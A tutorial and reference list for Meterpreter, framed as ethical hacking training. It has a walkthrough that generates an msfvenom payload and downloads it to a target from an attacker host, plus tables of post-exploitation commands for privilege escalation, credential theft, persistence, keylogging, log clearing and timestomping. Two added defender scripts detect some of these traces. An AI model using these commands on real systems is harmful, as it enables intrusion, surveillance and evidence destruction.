If you’ve dabbled with Metasploit, you’re likely aware that it contains a command-line tool called Meterpreter, which stands for “Metasploit Interpreter”.
This advanced payload has been part of Metasploit since 2004 and has C, PHP, Python, and Java implementations.
However, if you want to start with Meterpreter but don’t know where to begin, we’ve got you covered.
In this article, we’ll review what a Meterpreter shell is, whether it’s better than a reverse shell, and various categories of Meterpreter commands, including file manipulation, network surveillance, privilege escalation, and even remote access to the target machine’s hardware components such as its monitor.
Without further ado, let’s dive in.
- What Is a Meterpreter Shell?
- Is a Meterpreter Shell Better Than a Standard Reverse Shell?
- Meterpreter Commands List
- System Information and Management Meterpreter Commands
- Networking Meterpreter Commands
- File System Operations Meterpreter Commands
- User and Group Management Meterpreter Commands
- Privilege Escalation Meterpreter Commands
- Persistence and Lateral Movement Meterpreter Commands
- Capture and Exfiltration Meterpreter Commands
- Defensive Evasion Meterpreter Commands
- Miscellaneous Commands Meterpreter Commands
- Conclusion
- Frequently Asked Questions
What Is a Meterpreter Shell?
Once you’ve successfully exploited a target with Metasploit, the Meterpreter shell appears in the terminal of your attacking machine, granting you access to the target machine.
Many tutorials exist on spawning Meterpreter shells.
The method shown in the walkthrough below uses msfvenom to generate an executable file, which is downloaded to the target machine over the virtual machines’ bridged adapter.
By double-clicking on the executable file, the target connects to the attacker.
The commands used on the attacking machine (Kali Linux). Note that the handler is selected with use, the payload is set with set payload, and LPORT must match the port baked into the binary:
msfvenom -p windows/meterpreter_bind_tcp LPORT=443 -f exe -o bind.exe
python3 -m http.server 8000
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_bind_tcp
set rhost [target-ipv4]
set lport 443
exploit
The commands used in PowerShell on the Windows target machine (wget is an alias for Invoke-WebRequest, which needs a full URL and the -OutFile parameter; the netstat command confirms the bind payload is listening on port 443):
wget http://[attacker-ipv4]:8000/bind.exe -OutFile bind.exe
netstat -an | findstr 443
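The netstat check that closes the walkthrough is exactly the check a defender can run to spot a bind payload: a listening TCP port that is not part of the host’s baseline. The following Python script is an added example, not code from the original article or from the Metasploit project. It parses a constructed sample of Windows netstat -an output (the 0.0.0.0:443 listener stands in for bind.exe) against an assumed baseline of expected listeners; both the sample and the baseline set are assumptions for illustration.

```python
"""Flag unexpected listening TCP ports in Windows `netstat -an` output."""
import re

# Constructed sample of `netstat -an` output from a Windows workstation.
# The 0.0.0.0:443 listener stands in for the bind payload in the walkthrough.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.56.101:49700   192.168.56.1:8000      ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:5353           *:*
"""

# Assumed baseline: TCP ports this workstation is expected to expose.
# A real baseline comes from the asset inventory, not from a hard-coded set.
EXPECTED_TCP_LISTENERS = {135, 139, 445}

# Proto, local address, foreign address, optional state (UDP rows have none).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s*(\S+)?\s*$")


def parse_netstat(text):
    """Return one dict per socket row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        proto, local, foreign, state = match.groups()
        # rpartition keeps IPv6 literals such as "[::]" intact.
        addr, _, port = local.rpartition(":")
        rows.append({
            "proto": proto,
            "addr": addr,
            "port": int(port),
            "foreign": foreign,
            "state": state or "",
        })
    return rows


def unexpected_listeners(text, expected=EXPECTED_TCP_LISTENERS):
    """Return (address, port) pairs that are LISTENING but not in the baseline."""
    found = []
    for row in parse_netstat(text):
        if row["proto"] != "TCP" or row["state"] != "LISTENING":
            continue
        if row["port"] in expected:
            continue
        entry = (row["addr"], row["port"])
        if entry not in found:
            found.append(entry)
    return found


if __name__ == "__main__":
    for addr, port in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener: {addr}:{port}")
```

On a real host, replace SAMPLE_NETSTAT with the captured output of netstat -an (or netstat -ano to get the owning PID, which lets you tie the listener back to a process the way getpid does from the Meterpreter side).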
Let’s briefly compare a Meterpreter shell and a standard reverse shell.
Is a Meterpreter Shell Better Than a Standard Reverse Shell?
Meterpreter has more functions and is more flexible than a standard reverse shell.
Through it, you can access a webcam or microphone remotely, or easily upload and use Mimikatz, another pen-testing tool, through the Meterpreter extension called “kiwi.”
It also allows you to execute Metasploit modules directly on a target machine rather than write code to the target disk and run it there.
On the other hand, Meterpreter is such a widely known hacking tool that, unsurprisingly, antivirus and IDS/IPS solutions have ways to block it from running.
Additionally, Meterpreter is part of the Ruby-based Metasploit framework, while standard reverse shells can be written in various scripting and shell languages, such as C, Python, Perl, PHP, bash, and PowerShell.
Here is a comparison of the features of a Meterpreter shell and a standard reverse shell:
| Meterpreter shell | Standard reverse shell |
| --- | --- |
| Runs in memory: injects a DLL into an existing compromised process and can migrate to other running processes easily | Spawns new processes on the target machine |
| Can run Metasploit modules/extensions directly without downloading them to the target machine | Opens a standard terminal on the target machine |
| Payloads can be customized through Meterpreter scripting in Ruby | Functionality depends on the scripting language used |
| Contains functionality not readily available in standard shells, such as monitor, webcam, and microphone access | Requires the target to have the shellcode downloaded beforehand |
| Uses encrypted communications to evade detection | Firewalls and other security systems easily overlook outgoing connections from reverse shell code executed by the target machine |
Meterpreter Commands List
Below we break down the most useful Meterpreter commands into categories. While the full list of commands is massive, the following should provide a reference for the most common and useful ones for you.
- System Information and Management Meterpreter Commands
- Networking Meterpreter Commands
- File System Operations Meterpreter Commands
- User and Group Management Meterpreter Commands
- Privilege Escalation Meterpreter Commands
- Persistence and Lateral Movement Meterpreter Commands
- Capture and Exfiltration Meterpreter Commands
- Defensive Evasion Meterpreter Commands
- Miscellaneous Commands Meterpreter Commands
System Information and Management Meterpreter Commands
The following core commands will help you gather essential information about the target machine.
| Command | Explanation |
| --- | --- |
| sysinfo | Display system information. Learn about the target machine’s operating system, architecture, and other basic details. |
| getuid | Display user ID. The target machine identifies you as this user. |
| getpid | Display the process ID with which Meterpreter is running. By keeping this process alive, you maintain access to your target. |
| ps | List and display running processes on the target machine. The ps command helps identify vulnerable applications on the target. |
| bg/background (Ctrl+Z) | Put the current Meterpreter session in the background. After using this command, you can run other exploits from the attacking machine. |
Networking Meterpreter Commands
These networking commands in Meterpreter help you understand the target’s network structure.
| Command | Explanation |
| --- | --- |
| arp | Display the host ARP cache. You can use ARP spoofing to assess the security of a network and identify vulnerabilities. |
| getproxy | Display the current proxy configuration. You can obfuscate hacking activities or improve your security posture by using proxies. |
| portfwd | Forward packets from a local port to a remote service. This pivoting command relays TCP connections to and from the target machine, granting the attacker direct access. |
| route | View and modify the network routing table. You can use this to conduct attacks such as routing table poisoning and hijacking. |
| ifconfig/ipconfig | Show network interface configuration. Either command displays a system’s basic networking information, such as IP addresses. |
File System Operations Meterpreter Commands
These commands manipulate files and directories on the attacking (local) and target (remote) machines. Many bash or Windows cmd file system commands apply to Meterpreter, and commands prefixed with the small letter “l” (as in “local”) apply to the attacking machine.
| Command | Explanation |
| --- | --- |
| ls/lls | List all remote/local files. Use this to navigate the target and attacking machines to know what exploits to launch and where to launch them. |
| pwd/lpwd | Print the current remote/local working directory. If you’re running a server on your attacking machine, such as with the command python3 -m http.server 8000, you’ll know which directory your target connects to. |
| upload/download | Upload/download a file or directory from local/remote to remote/local. Although Meterpreter doesn’t require writing anything to the target disk, this pair of commands may be helpful for executing shellcode on and saving files from the target. |
| rm/del | Delete remote files. Either command works on Windows and Linux targets alike. It is especially useful for covering your tracks and cleaning up post-exploitation, and nothing deleted using these commands goes into the target’s recycle bin. |
| show_mount | List all mount points/logical drives. The list includes hard drives, optical disk drives, and network drives, which tells you what storage the target can reach. |
User and Group Management Meterpreter Commands
Some of these commands, such as add_user, require the Meterpreter extension incognito (use incognito). Tokens are temporary keys allowing you to access the target machine and network without providing credentials. This and the next section on Privilege Escalation concern the use of tokens.
| Command | Explanation |
| --- | --- |
| add_user | Attempt to add a user with all tokens to the target system. You can use this command to create a backdoor. Later, you can remove it through a shell with admin privileges. In Windows, it’s cmd > net user [username] /delete. |
| add_group_user | Attempt to add a user to a global group on a host with all accessible tokens. The purpose of this command is to allow the new user to inherit the group’s privileges. |
| getprivs | Attempt to enable all privileges available to the current process on the target. You gain more control and access to the system. |
| list_tokens | List all accessible tokens and their privilege level using the options -u to sort by unique user name and -g by unique group name. |
| impersonate_token | Instruct the Meterpreter thread to impersonate the specified token. Everything you do from this point onward on the entire system is in the context of that token. |
Privilege Escalation Meterpreter Commands
Here are a few explicit Meterpreter commands that can elevate the attacker’s privilege on the target machine. Load the “priv” extension (use priv) before using the “getsystem” command.
| Command | Explanation |
| --- | --- |
| getsystem | Attempt to elevate your privilege to that of the target (local) system. You can gain admin- or root-level access with the command. |
| steal_token [PID] | Attempt to steal an impersonation token from the target process marked by PID. Usually, you aim for a user with higher privileges so that you can control the process. |
| drop_token | Relinquish any active impersonation token. Using this command drops the impersonation token from the current process, reducing the level of privileges. |
| rev2self | Attempt to revert to the original token, which is useful after privilege escalation. This command helps if you’ve made a mistake escalating to the wrong set of privileges. |
Persistence and Lateral Movement Meterpreter Commands
Hackers need to learn how to maintain a Meterpreter session and move laterally across hosts and networks for greater flexibility and to evade detection. The Kiwi extension in Meterpreter is Mimikatz 2.0.
| Command | Explanation |
| --- | --- |
| run [persistence] | Run a Meterpreter persistence module on the target machine to maintain access or create a persistent backdoor. Persistence is especially key for conducting prolonged attacks in stealth. Windows module: exploit/windows/local/persistence. Linux modules: exploit/linux/local/service_persistence, exploit/linux/local/cron_persistence (or similar). |
| use kiwi | Load the Kiwi (Mimikatz 2.0) extension into the current Meterpreter session. You must run this command before using any Kiwi commands below. |
| kiwi_cmd [option] | Execute an arbitrary Mimikatz command (unparsed) via Meterpreter. The help menu comes with some fun commands, and if you’re familiar with Mimikatz, you’ll love this. |
| golden_ticket_create [options] | Create a golden Kerberos ticket. The namesake refers to the all-access golden ticket in the novel Charlie and the Chocolate Factory. Unlike an ordinary “ticket granting ticket” (TGT) issued through the Kerberos Key Distribution Center (KDC), a golden Kerberos ticket allows you to bypass vital layers of authentication and can be dangerous in the wrong hands. |
| run autoroute | Insert routes for the target into Metasploit’s routing table so that Metasploit knows how to route traffic through the session. The autoroute module is another pivot. The general use of the run command is to execute a Meterpreter script. Sometimes this command may generate warning messages; alternatively, use the command run post/multi/manage/autoroute instead. |
Capture and Exfiltration Meterpreter Commands
Here are a few user interface commands to transfer data from the target machine. The help menu (meterpreter > help) lists other commands for hijacking the target’s sound system and webcams, such as play, record_mic, and webcam_list.
| Command | Explanation |
| --- | --- |
| screenshot | Grab a screenshot of the target’s interactive desktop. Keep a record of your observations on the target machine for security audits. |
| screenshare | Watch the remote user’s desktop in real time. This command is helpful when your attack takes place over some time, such as several hours, and you want to see how it unfolds. |
| keyscan_start/keyscan_stop | Start/stop capturing keystrokes on the target. Keyscan functions as a keylogger and tracks the target’s keyboard input. |
| keyscan_dump | Dump the buffer of keystrokes captured on the target. Use this command between keyscan_start and keyscan_stop to see what the target user has been typing. |
| enumdesktops | List all accessible desktops (separate graphical environments) and window stations of the target. Each item on the list has a session ID to which you can apply Meterpreter commands specific to a particular desktop. |
Defensive Evasion Meterpreter Commands
During ethical hacking, the target system may catch you red-handed. What can you do to prevent such an outcome or minimize your damage?
| Command | Explanation |
| --- | --- |
| clearev | Clear the event logs on the target system. You can’t afford to leave traces of your break-in there, so you must remove all your digital footprints before exiting the target machine. |
| timestomp | Manipulate timestamps of affected files to cover your tracks. The name is a play on “timestamp” and “stomp,” as if to stomp out metadata changes so that nothing ever appears to have happened. |
| migrate | Move the Meterpreter session to another process. You’d use this command often for stealth because it’s in your best interest to keep the Meterpreter shell connection alive for as long as possible. |
| uictl | Freeze the keyboard, mouse, or both on the target machine. The options are enable/disable keyboard/mouse/all. You can cover your tracks while the target user wonders what’s going on. |
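Each evasion command above leaves its own artefact, and the first two are worth checking for from the blue-team side. Clearing a Windows event log produces a new record: Security event ID 1102 (“The audit log was cleared”) and System event ID 104 (“The System log file was cleared”). timestomp rewrites a file’s $STANDARD_INFORMATION timestamps, but the $FILE_NAME timestamps in the same MFT record are not touched by that user-mode API, so a $SI creation time that predates the $FN creation time, or $SI times with zero sub-second precision next to $FN times that have it, are classic indicators. The following Python script is an added example, not code from the original article or the Metasploit project; the event records and MFT timestamp pairs are constructed samples, and the filenames are assumptions.

```python
"""Defender-side checks for two Meterpreter evasion commands: clearev and timestomp."""
from datetime import datetime

# Constructed sample of Windows event records as (channel, event_id, message).
SAMPLE_EVENTS = [
    ("Security", 4624, "An account was successfully logged on."),
    ("Security", 1102, "The audit log was cleared."),
    ("System", 104, "The System log file was cleared."),
    ("Application", 1000, "Faulting application name: notepad.exe"),
]

# Event IDs Windows itself writes when a log is cleared (well-known IDs).
LOG_CLEARED_IDS = {("Security", 1102), ("System", 104)}


def log_clear_events(events):
    """Return the records that show a log was cleared, e.g. after clearev."""
    return [e for e in events if (e[0], e[1]) in LOG_CLEARED_IDS]


# Constructed MFT-style timestamps per file: $STANDARD_INFORMATION (what
# timestomp rewrites) versus $FILE_NAME (left alone by the user-mode API).
# Paths and values are assumptions for this example.
SAMPLE_MFT = {
    r"C:\Windows\System32\calc.exe": {
        "si_created": datetime(2019, 3, 19, 4, 49, 37, 123456),
        "fn_created": datetime(2019, 3, 19, 4, 49, 37, 123456),
    },
    r"C:\Users\Public\bind.exe": {
        "si_created": datetime(2015, 1, 1, 0, 0, 0, 0),
        "fn_created": datetime(2024, 5, 2, 13, 7, 41, 554000),
    },
}


def timestomp_indicators(mft):
    """Map each suspicious path to the list of heuristics it triggered."""
    findings = {}
    for path, ts in mft.items():
        reasons = []
        # $SI creation earlier than $FN creation: the visible timestamp was
        # pushed into the past (file moves can also cause this; treat as a lead).
        if ts["si_created"] < ts["fn_created"]:
            reasons.append("$SI created precedes $FN created")
        # Whole-second $SI next to a sub-second $FN: typical of tools that set
        # times with one-second granularity (heuristic, not Meterpreter-specific).
        if ts["si_created"].microsecond == 0 and ts["fn_created"].microsecond != 0:
            reasons.append("$SI timestamp has zero sub-second precision")
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for channel, event_id, msg in log_clear_events(SAMPLE_EVENTS):
        print(f"log cleared: {channel} {event_id}: {msg}")
    for path, reasons in timestomp_indicators(SAMPLE_MFT).items():
        print(f"possible timestomp on {path}: {'; '.join(reasons)}")
```

In practice the event records come from the Security and System channels (Get-WinEvent or a SIEM export) and the $SI/$FN pairs from a parsed $MFT; both heuristics produce leads for a forensic examiner rather than verdicts, since legitimate file moves can also leave $SI earlier than $FN.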
Miscellaneous Commands Meterpreter Commands
Here are some useful Meterpreter commands belonging to one or more categories above.
| Command | Explanation |
| --- | --- |
| shell | Drop into a system command shell. You can execute (reverse) shell code from the terminal of the target machine as if you were a legitimate user. |
| execute | Execute a command. You can execute (reverse) shell code on the target machine without entering the shell. Usage: execute -f [file] [options]. The options are listed below the table. |
| help/? | Display the Meterpreter help menu. Learn new Meterpreter commands and refresh your memory on those you’ve understood. |
| localtime | Display the local date and time of the target system. This information is crucial to minimize the amount of suspicious data on the target machine. |
| idletime | Display the number of seconds the user has been idle on the remote system. This command is useful because you may encounter timeouts on your target machine, which can hinder you from completing attacks or covering your tracks. |
Options for execute:
- -H : Create the process hidden from view
- -a : The arguments to pass to the command
- -c : Channelized I/O (required for interaction)
- -d : The ‘dummy’ executable to launch when using -m
- -f : The executable command to run
- -h : Help menu
- -i : Interact with the process after creating it
- -m : Execute from memory
- -t : Execute the process using the currently impersonated thread token
Conclusion
We hope this list of Meterpreter commands helps you get started with Meterpreter shell commands and wield Meterpreter like a pro. Those interested in ethical hacking and penetration testing would benefit from mastery of Meterpreter.
Don’t forget to check out our StationX Membership to access a wide range of ethical hacking, penetration testing, and related courses. If you intend to pursue a career in these fields, we have handpicked a selection of courses for you below, and we wish you success.